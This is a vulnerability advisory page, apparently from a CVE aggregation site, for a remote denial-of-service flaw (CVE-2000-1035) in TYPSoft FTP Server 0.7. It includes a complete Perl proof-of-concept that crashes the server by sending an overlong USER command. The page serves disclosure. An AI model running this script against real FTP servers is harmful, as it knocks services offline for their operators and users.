TYPSoft FTP Server remote DoS Vulnerability

BID:1690

Info

TYPSoft FTP Server remote DoS Vulnerability

Bugtraq ID: 1690
Class: Input Validation Error
CVE: CVE-2000-1035
Remote: Yes
Local: Yes
Published: Jun 08 1999 12:00AM
Updated: Jul 11 2009 03:56AM
Credit: This vulnerability was originally reported to bugtraq by dethy <[email protected]>.
Vulnerable: TYPSoft TYPSoft 0.7 x
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows NT 4.0
Not Vulnerable:

Discussion

TYPSoft FTP Server remote DoS Vulnerability

Long commands (ie., over 2048 bytes) sent to TYPSoft FTP Server cab cause the server to hang, requiring a manual restart to restore the process.

After the release of this advisory Noam Rathaus from http://www.BeyondSecurity.com contributed the following addendum:

.. "this product is also vulnerable if you connect to the server, but not send anything (do the SYN/ACK sequence but disconnect immediately). This is due to the fact that they use a DELPHI TSocket class, which doesn't handle exceptions very well. "

Exploit / POC

TYPSoft FTP Server remote DoS Vulnerability

This exploit was excerpted from the original advisory by dethy (www.synnergy.net):

simple script to send a long 'user' command to the server, resulting
in the ftpd crashing.

================&lt;cut&gt;==================
#!/usr/bin/perl
use Getopt::Std;
use IO::Socket;
getopts('s:', \%args);
if(!defined($args{s})){&amp;usage;}
$serv = $args{s};
$foo = "A"; $number = 2048;
$data .= $foo x $number; $EOL="\015\012";
$remote = IO::Socket::INET-&gt;new(
Proto =&gt; "tcp",
PeerAddr =&gt; $args{s},
PeerPort =&gt; "ftp(21)",
) || die("Unable to connect to ftp port at $args{s}\n");
$remote-&gt;autoflush(1);
print $remote "USER $data". $EOL;
while (&lt;$remote&gt;){ print }
print("\nCrash was successful !\n");

sub usage {die("\n$0 -s &lt;server&gt;\n\n");}
================&lt;/cut&gt;====================

Solution / Fix

TYPSoft FTP Server remote DoS Vulnerability

Solution:
Currently the SecurityFocus staff are not aware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].

References

TYPSoft FTP Server remote DoS Vulnerability

References:
© CVE.report 2026 |

Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. It is the responsibility of user to evaluate the accuracy, completeness or usefulness of any information, opinion, advice or other content. EACH USER WILL BE SOLELY RESPONSIBLE FOR ANY consequences of his or her direct or indirect use of this web site. ALL WARRANTIES OF ANY KIND ARE EXPRESSLY DISCLAIMED. This site will NOT BE LIABLE FOR ANY DIRECT, INDIRECT or any other kind of loss.

CVE, CWE, and OVAL are registred trademarks of The MITRE Corporation and the authoritative source of CVE content is MITRE's CVE web site. This site includes MITRE data granted under the following license.

Free CVE JSON API cve.report/api

CVE.report and Source URL Uptime Status status.cve.report